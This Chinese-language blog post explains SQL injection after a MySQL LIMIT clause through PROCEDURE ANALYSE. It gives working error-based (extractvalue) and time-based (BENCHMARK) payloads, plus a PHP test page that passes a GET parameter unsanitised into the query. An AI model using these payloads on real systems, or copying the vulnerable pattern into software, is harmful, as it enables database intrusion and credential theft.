原文: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ http://zone.wooyun.org/content/18220
此方法适用于MySQL 5.x中,在limit语句后面的注入
例如:
1 |
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point |
上面的语句包含了ORDER BY,MySQL当中UNION语句不能在ORDER BY的后面,否则利用UNION很容易就可以读取数据了,看看在MySQL 5中的SELECT语法:
02 |
[ALL | DISTINCT | DISTINCTROW ] |
05 |
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] |
06 |
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] |
07 |
select_expr [, select_expr ...] |
08 |
[FROM table_references |
09 |
[WHERE where_condition] |
10 |
[GROUP BY {col_name | expr | position} |
11 |
[ASC | DESC], ... [WITH ROLLUP]] |
12 |
[HAVING where_condition] |
13 |
[ORDER BY {col_name | expr | position} |
15 |
[LIMIT {[offset,] row_count | row_count OFFSET offset}] |
16 |
[PROCEDURE procedure_name(argument_list)] |
17 |
[INTO OUTFILE 'file_name' export_options |
18 |
| INTO DUMPFILE 'file_name' |
19 |
| INTO var_name [, var_name]] |
20 |
[FOR UPDATE | LOCK IN SHARE MODE]] |
在LIMIT后面可以跟两个函数,PROCEDURE 和 INTO,INTO除非有写入shell的权限,否则是无法利用的,那么使用PROCEDURE函数能否注入呢? Let’s give it a try:
1 |
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); |
3 |
ERROR 1386 (HY000): Can't use ORDER clause with this procedure |
ANALYSE可以有两个参数:
1 |
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1); |
3 |
ERROR 1386 (HY000): Can't use ORDER clause with this procedure |
看起来并不是很好,继续尝试:
1 |
mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1); |
但是立即返回了一个错误信息:
1 |
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse' |
sleep函数肯定没有执行,但是最终我还是找到了可以攻击的方式:
1 |
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); |
3 |
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' |
如果不支持报错注入的话,还可以基于时间注入:
1 |
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((selectextractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1) |
直接使用sleep不行,需要用BENCHMARK代替。
我亲测好用~这里附上我的测试代码:
01 <?php
02 header("Content-Type: text/plain; charset=utf-8");
03 require("mysql.class.php");
04 $mysql = new MySQL("test", "root", "root");
05
06 $users = $mysql->executeSQL("SELECT * FROM user where uid < 100 ORDER BY uid limit {$_GET['p']}, 10");
07 if($users){
08 $users = var_export($users, TRUE);
09 echo $users;
10 }else{
11 echo $mysql->lastError;
12 }
|
|
报错注入获得root密码:
报错注入获得mysql用户:
